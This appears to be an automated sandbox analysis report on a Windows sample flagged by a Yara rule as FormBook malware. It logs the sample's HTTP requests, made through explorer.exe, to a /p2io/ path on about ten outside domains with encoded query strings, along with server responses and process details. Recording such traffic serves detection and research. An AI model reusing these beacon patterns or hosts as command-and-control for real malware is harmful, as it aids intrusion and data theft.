                                                                      Jun 10, 2021 18:08:00.232477903 CEST4968OUTGET /p2io/?CFQHg=4oufm6g5t6Bqg3y0mDBWoA8I6Q2bNaX51tGc9mj7mZf0wZ/j7IpC3Y+it5NkyKMHKzCR&Pr980v=G2MtWNVHS HTTP/1.1
                                                                      Host: www.adultpeace.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jun 10, 2021 18:08:00.626985073 CEST4969INHTTP/1.1 301 Moved Permanently
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Expires: Thu, 10 Jun 2021 17:08:00 GMT
                                                                      Cache-Control: max-age=3600
                                                                      X-Redirect-By: WordPress
                                                                      Location: http://adultpeace.com/p2io/?CFQHg=4oufm6g5t6Bqg3y0mDBWoA8I6Q2bNaX51tGc9mj7mZf0wZ/j7IpC3Y+it5NkyKMHKzCR&Pr980v=G2MtWNVHS
                                                                      Content-Length: 0
                                                                      Date: Thu, 10 Jun 2021 16:08:00 GMT
                                                                      Server: LiteSpeed


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      10192.168.2.44977578.31.67.9180C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jun 10, 2021 18:08:50.534192085 CEST5022OUTGET /p2io/?CFQHg=pxlxKDN0Rvw8YUTnsB4Bv4ohCC0AYWvU81fxb+r9dLiNjjqdMXiyL1Lf04YLJeQ+Gz7y&Pr980v=G2MtWNVHS HTTP/1.1
                                                                      Host: www.cleanxcare.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jun 10, 2021 18:08:50.589107037 CEST5023INHTTP/1.1 301 Moved Permanently
                                                                      Connection: close
                                                                      Content-Type: text/html
                                                                      Content-Length: 707
                                                                      Date: Thu, 10 Jun 2021 16:08:50 GMT
                                                                      Location: https://www.cleanxcare.com/p2io/?CFQHg=pxlxKDN0Rvw8YUTnsB4Bv4ohCC0AYWvU81fxb+r9dLiNjjqdMXiyL1Lf04YLJeQ+Gz7y&Pr980v=G2MtWNVHS
                                                                      X-Content-Type-Options: nosniff
                                                                      X-XSS-Protection: 1; mode=block
                                                                      Vary: User-Agent
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      2192.168.2.44976574.220.199.880C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jun 10, 2021 18:08:06.041508913 CEST4969OUTGET /p2io/?CFQHg=wzEdtbrCY4VKdG4P/h093gtD2EzP1yO8zPZJPXBkhd23ZEiSfiVlmlbiUjAoERCVF5eV&Pr980v=G2MtWNVHS HTTP/1.1
                                                                      Host: www.cmannouncements.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jun 10, 2021 18:08:06.536820889 CEST4970OUTGET /p2io/?CFQHg=wzEdtbrCY4VKdG4P/h093gtD2EzP1yO8zPZJPXBkhd23ZEiSfiVlmlbiUjAoERCVF5eV&Pr980v=G2MtWNVHS HTTP/1.1
                                                                      Host: www.cmannouncements.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jun 10, 2021 18:08:06.724903107 CEST4971INHTTP/1.1 200 OK
                                                                      Date: Thu, 10 Jun 2021 16:08:06 GMT
                                                                      Server: Apache/2.2.31 (CentOS)
                                                                      Connection: close
                                                                      Transfer-Encoding: chunked
                                                                      Content-Type: text/html; charset=ISO-8859-1
                                                                      Data Raw: 31 35 33 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 3e 0a 3c 74 69 74 6c 65 3e 57 65 6c 63 6f 6d 65 20 63 6d 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 73 2e 63 6f 6d 20 2d 20 48 6f 73 74 6d 6f 6e 73 74 65 72 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 68 6f 73 74 6d 6f 6e 73 74 65 72 2e 63 6f 6d 2f 6d 65 64 69 61 2f 73 68 61 72 65 64 2f 69 6e 66 6f 2f 69 6e 64 65 78 2f 5f 68 6d 2f 68 6f 6d 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 68 6f 73 74 6d 6f 6e 73 74 65 72 2e 63 6f 6d 2f 6d 65 64 69 61 2f 73 68 61 72 65 64 2f 67 65 6e 65 72 61 6c 2f 5f 68 6d 2f 68 6f 6d 65 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 2f 77 77 77 2e 68 6f 73 74 6d 6f 6e 73 74 65 72 2e 63 6f 6d 2f 6d 65 64 69 61 2f 73 68 61 72 65 64 2f 67 65 6e 65 72 61 6c 2f 5f 68 6d 2f 68 6f 6d 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2e 72 6f 6c 6c 6f 76 65 72 20 61 20 7b 20 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 20 68 65 69 67 68 74 3a 32 37 70 78 3b 77 69 64 74 68 3a 31 34 30 70 78 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 2f 2f 77 77 77 2e 68 6f 73 74 6d 6f 6e 73 74 65 72 2e 63 6f 6d 2f 6d 65 64 69 61 2f 73 68 61 72 65 64 2f 67 65 6e 65 72 61 6c 2f 5f 68 6d 2f 63 70 6c 6f 67 69 6e 2e 67 69 66 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 20 30 3b 7d 20 0a 2e 72 6f 6c 6c 6f 76 65 72 20 61 3a 68 6f 76 65 72 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 2f 2f 77 77 77 2e 68 6f 73 74 6d 6f 6e 73 74 65 72 2e 63 6f 6d 2f 6d 65 64 69 61 2f 73 68 61 72 65 64 2f 67 65 6e 65 72 61 6c 2f 5f 68 6d 2f 63 70 6c 6f 67 69 6e 5f 64 6f 77 6e 2e 67 69 66 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 20 30 3b 20 7d 0a 2e 73 75 62 5f 62 6f 74 74 6f 6d 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 69 6e 68 65 72 69 74 20 7d 0a 2e 63 62 6c 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 69 6e 68 65 72 69 74 20 7d 0a 2e 63 62 72 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 69 6e 68 65 72 69 74 20 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 31 30 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 52 4f 42 4f 54 53 22 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 4e 4f 46 4f 4c 4c 4f 57 22 3e 20 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 69 66 20 28 77 69 6e 64 6f 77 2e 74 6f
                                                                      Data Ascii: 1534<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><title>Welcome cmannouncements.com - Hostmonster.com</title><link href="//www.hostmonster.com/media/shared/info/index/_hm/home.css" rel="stylesheet" type="text/css"><link href="//www.hostmonster.com/media/shared/general/_hm/homestyle.css" rel="stylesheet" type="text/css"><script type="text/javascript" src="//www.hostmonster.com/media/shared/general/_hm/home.js"></script><style type="text/css">.rollover a { display:block; height:27px;width:140px; background: url('//www.hostmonster.com/media/shared/general/_hm/cplogin.gif') no-repeat 0 0;} .rollover a:hover { background: url('//www.hostmonster.com/media/shared/general/_hm/cplogin_down.gif') no-repeat 0 0; }.sub_bottom { background: inherit }.cbl { background: inherit }.cbr { background: inherit }</style><meta name="revisit-after" content="10"><meta name="ROBOTS" content="NOINDEX, NOFOLLOW"> </head><body><script type="text/javascript"> if (window.to


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      3192.168.2.449766172.107.55.680C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jun 10, 2021 18:08:11.821222067 CEST4976OUTGET /p2io/?CFQHg=Z8FkwwkqwMcbR63JqM/eMJCTIQtJD+6S4GLVkEvBdcKRRdmUAPmyd56itTHHstyDZ3vx&Pr980v=G2MtWNVHS HTTP/1.1
                                                                      Host: www.leonardocarrillo.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jun 10, 2021 18:08:12.061254978 CEST4977INHTTP/1.1 301 Moved Permanently
                                                                      Server: nginx
                                                                      Date: Thu, 10 Jun 2021 16:08:28 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      X-Powered-By: PHP/7.3.20
                                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                                      Location: http://leonardocarrillo.com/p2io/?CFQHg=Z8FkwwkqwMcbR63JqM/eMJCTIQtJD+6S4GLVkEvBdcKRRdmUAPmyd56itTHHstyDZ3vx&Pr980v=G2MtWNVHS
                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      4192.168.2.44976754.69.66.22780C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jun 10, 2021 18:08:17.525732040 CEST4978OUTGET /p2io/?CFQHg=H0m9fF/5FM7UqIICC4653EpAABAppk+gPAvqYefbAICNl1a1FFJvvx6E9HTJL6Hcfv3l&Pr980v=G2MtWNVHS HTTP/1.1
                                                                      Host: www.dreamcashbuyers.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jun 10, 2021 18:08:17.743844032 CEST4978INHTTP/1.1 301 Moved Permanently
                                                                      Location: https://www.dreamcashbuyers.com/p2io/?CFQHg=H0m9fF/5FM7UqIICC4653EpAABAppk+gPAvqYefbAICNl1a1FFJvvx6E9HTJL6Hcfv3l&Pr980v=G2MtWNVHS
                                                                      Date: Thu, 10 Jun 2021 16:08:17 GMT
                                                                      Content-Length: 0
                                                                      Connection: close


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      5192.168.2.449768199.195.117.14780C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jun 10, 2021 18:08:23.084971905 CEST4979OUTGET /p2io/?CFQHg=0YkKA47wwnQsSd2I7kPMKR9IRaKfA7HvmAjNs5nkCsbL4/Nj4Thso/t2FfIp2mnBj9Pa&Pr980v=G2MtWNVHS HTTP/1.1
                                                                      Host: www.swayam-moj.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jun 10, 2021 18:08:23.239788055 CEST4980INHTTP/1.1 404 Not Found
                                                                      Date: Thu, 10 Jun 2021 16:08:23 GMT
                                                                      Server: Apache/2.4.48 (cPanel) OpenSSL/1.1.1k mod_bwlimited/1.4
                                                                      Content-Length: 315
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      6192.168.2.449769156.241.53.16180C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jun 10, 2021 18:08:28.563146114 CEST4981OUTGET /p2io/?CFQHg=DTtQlm+bkwamRHt6VrobrkMYYvpq+NlfspH3ROyN3o99G08d4+CoiJMc5PUrO1w4I+TP&Pr980v=G2MtWNVHS HTTP/1.1
                                                                      Host: www.hfjxhs.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jun 10, 2021 18:08:29.303756952 CEST4991INHTTP/1.1 302 Moved Temporarily
                                                                      Date: Thu, 10 Jun 2021 16:08:28 GMT
                                                                      Server: Apache
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                      Pragma: no-cache
                                                                      Set-Cookie: PHPSESSID=8guk2q7o041l5h2cg3f0fssdf2; path=/
                                                                      Upgrade: h2
                                                                      Connection: Upgrade, close
                                                                      Location: /
                                                                      Content-Length: 0
                                                                      Content-Type: text/html; charset=gbk


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      7192.168.2.44977299.83.154.11880C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jun 10, 2021 18:08:34.334511042 CEST5001OUTGET /p2io/?CFQHg=lrOqxb+RJFhwpubsYZ1tkMjkgx31NOkXgmE0j6vPa760pj23uu3lC+ndsaG2+azAf30S&Pr980v=G2MtWNVHS HTTP/1.1
                                                                      Host: www.defenestration.world
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jun 10, 2021 18:08:34.522964954 CEST5001INHTTP/1.1 403 Forbidden
                                                                      Date: Thu, 10 Jun 2021 16:08:34 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 146
                                                                      Connection: close
                                                                      Server: nginx
                                                                      Vary: Accept-Encoding
                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      8192.168.2.449773198.54.117.21680C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jun 10, 2021 18:08:39.800529003 CEST5003OUTGET /p2io/?CFQHg=fW2NkW2j278wyrs6d/m+egXTc5dWq8qtohQAL+tQrXSmfdetyJ3HBVVg7gxxicKRFJwM&Pr980v=G2MtWNVHS HTTP/1.1
                                                                      Host: www.boogerstv.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      9192.168.2.449774198.185.159.14480C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jun 10, 2021 18:08:45.237778902 CEST5004OUTGET /p2io/?CFQHg=TySV6YYzJGXnavbEwOCoDLKT5SC+Z4HfI/S6WoKTLKp4rrhaLWxPw3pQ7MooJpxvMOcw&Pr980v=G2MtWNVHS HTTP/1.1
                                                                      Host: www.totally-seo.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jun 10, 2021 18:08:45.409755945 CEST5005INHTTP/1.1 400 Bad Request
                                                                      Cache-Control: no-cache, must-revalidate
                                                                      Content-Length: 77564
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Date: Thu, 10 Jun 2021 16:08:45 UTC
                                                                      Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                      Pragma: no-cache
                                                                      Server: Squarespace
                                                                      X-Contextid: SVwprJ2l/84MWoE3z
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20
                                                                      Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;


                                                                      Code Manipulations

                                                                      Statistics

                                                                      Behavior

                                                                      Click to jump to process

                                                                      System Behavior

                                                                      Analysis Process: lTAPQJikGw.exe PID: 7056 Parent PID: 5976

                                                                      General

                                                                      Start time:18:06:48
                                                                      Start date:10/06/2021
                                                                      Path:C:\Users\user\Desktop\lTAPQJikGw.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\Desktop\lTAPQJikGw.exe'
                                                                      Imagebase:0xec0000
                                                                      File size:865792 bytes
                                                                      MD5 hash:16657FA097CD334973A5489EEFF8BAFE
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.658248909.0000000004349000.00000004.00000001.sdmp, Author: Joe Security
